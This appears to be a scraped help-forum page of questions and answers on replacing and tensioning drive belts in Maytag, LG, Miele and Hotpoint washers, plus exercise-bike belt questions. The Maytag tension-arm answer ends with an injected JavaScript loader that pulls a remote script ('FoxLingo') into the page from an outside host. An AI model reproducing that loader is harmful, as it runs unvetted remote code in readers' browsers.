Question about Washing Machines

I have a problem with my Lifestyler C760 Triple Action Electromagnetic Silent Drive Exercise Bike. The tension belt (drive belt) walks up on to the right/outside edge of the tension pulley (pedal crank pulley). The belt appears to be in good condition. A replacement belt is no longer available. I have adjusted the belt tension per the manual instructions, but this does not solve the problem. I don't understand how to align the rear tension pulley with the front belt hub so that the belt will stay in the pulley groove. Any suggestions?

How can I get the specifications for the powersupply/Power Cable of the Sears Lifestyler C760 exercise bike?
I have a number of powersupplies but I am not sure which one works with my Lifestyler C760 exercise bike. I do not want to apply the wrong voltage by using one with too high of a power rating

TROMM WM2277HW Front loader washer has an increasing louder spin cycle.

LOUD NOISES IN MACHINE;
LOT OF THINGS TO CHECK, THE BELT LOOSE OR WORN, THE CLUTCH, THE TRANNY, THE BEARINGS BOTH TUB SEAL AND BEARING, THE REAR DRUM BEARING,
THE DRIVE PULLEY- If the washer is making a loud noise the drive pulley might be worn out, cracked, loose or bent. Remove the drive pulley and inspect it carefully. If it is damaged or defective replace it.
THE TRANSMISSION, THE MOTOR COUPLER, THE MOTOR DRIVE BEARINGS,
THE DRIVE MOTOR- If the washer is making a loud noise the drive motor bearings may have worn out. Washer motors are normally almost silent when they run. If the motor is run without a belt hooked up to it and it's loud it will have to be replaced.

Maytag washer #PAV244Aww does not spin or drain the water, but if i hold the motor would do the job, it need tension on the belt

You will need to replace the drive belt of the spring on the tension arm. With the power discinnected try pushing the tension arm. If it is relatively stiff then the chances are the spring is OK. If you can move the arm freely then the spring will need replacing. Look at the drive belt to see if it is worn. Look at the drive belt grooves for uniformity and check for any damage. A new dreive belt is a fairly common requirement for Maytag machines.!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState '' this.readyState=="loaded" '' this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

On my washer the belt come off

You will need to use a socket set to loosen the belt tension bolt. Then place the belt over the drive wheels.

Now tighten the belt tensioning bolt, while applying force to the belt to tighten it around the drive wheels.

take care!

I got a new belt for my washer, but cant get it back on seems too small but it is the right belt.

I have foun even with the Drive Belt/Motor tension bolt tension released it is difficult to walk the drive belt back on the Clutch pulley. As you can see there is not much room to work. I have a 6 yr old maytag top loader washer that does not wash or spin. It filled up with water and then stopped working. The power light is on but it does nothing . Any suggestions?

There is plainly no drive to the drum, it could be a broken drive belt or a dead motor.

Is there any humming from the motor?

If all is silent it could be the motor has died. If there is any sign that the motor is turning, then the drive belt could be gone.

Remove the back and look at the drive.

Alternatively the driver circuit board may need replacement.

Agitator will not work on wash but works on pre wash and rince.

Hello, welcome to Fixya.

It sounds like you may have a broken belt based on your description,

"it starts up fine and then is silent and motionless through the entire wash cycle. this is true in normal, permanent press, and delicate cycles"

Does the timer advance if left alone after filling ?

Have you access the back panel ( removed it ) and visually inspect the washer drive system ( belt, pulley, motor ) ?

You could also have a faulty motor, although that typically manifest's in only rotating in one direction and not the other so you would see some action.

Have you tried the washer in a spin cycle ?

Let me know how far you've progressed in the diagnosis and I'll watch for your reply and assist you further if necessary.

How to replace the belt on the Maytag Neptune FAV6800AAW?

http://www.ehow.com/how_5649680_change-belt-maytag-neptune.html
Remove the back plate of the the washer. Loosen the 1/2" bolt that holds the motor to provide a little "play" in the motor shaft. Loop the belt under the motor shaft onto the pulley. Now pull the belt up onto the large pulley as far up as you can go and start rotating the belt and the pulley together until the entire belt is fed onto the pulley. This will be very tight and not easy. Retighten the 1/2" bolt. Manually rotate the belt and pulley around a few times both ways (clockwise and counterclockwise) to be sure it has seated on the motor pulley and large pulley. If the belt keeps coming off no matter how you reseat it you have a bigger problem.

I need to replace the belt on my Miele washing machine. Can you tell me how to do it?

Open the washing machine's back access panel.Depending on the make and model of your washing machine, you may need a screwdriver to unscrew the screws that hold the panel up.Locate the washing machine's drive belt.It will be in clear view, detach the old drive belt.Use the screwdriver to unscrew the pump coupling. Then gently slide the old belt off of the drive belt notch. If the belt is broken,be careful not to leave any pieces in the washing machine's interior. Slide the new washing machine drive belt over the drive belt pulley in the machine.Carefully stretch the belt up and over the second pulley before releasing.Use the screwdriver to re-attach the pump coupling.Test the drive belt's tension. If it is looser, tighten the pulleys to increase the belt's tension.Replace the access panel and resume using your washing machine.

triple action (bounces up and down)

HOTPOINT WMA9P WASHING MACHINE

Loosen the tensioner (if equipped) and re-route the belt around the drive and tub pulleys.

If no tensioner - good old fashioned leverage using a screwdriver. Put it around the small pulley first - then the big.
